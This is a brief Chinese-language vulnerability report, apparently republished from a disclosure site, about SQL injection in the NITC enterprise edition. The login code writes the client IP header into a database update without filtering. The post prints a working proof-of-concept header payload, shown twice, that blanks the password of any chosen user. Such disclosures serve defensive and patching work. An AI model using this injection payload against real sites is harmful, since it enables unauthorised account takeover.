NITC企业版SQL注入,可重置任意用户密码

文章目录

漏洞作者: 路人甲

 

ip获取没有进行过滤,导致网站多处sql注入

此处 用户登录的时候,记录用户登录IP操作,由于update用户数据,可以直接利用sql注入update任意用户的密码。

POC: head头上加入 client-ip:’,password=” where member_id=1#

漏洞证明:

POC: head头上加入 client-ip:’,password=” where member_id=1#

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录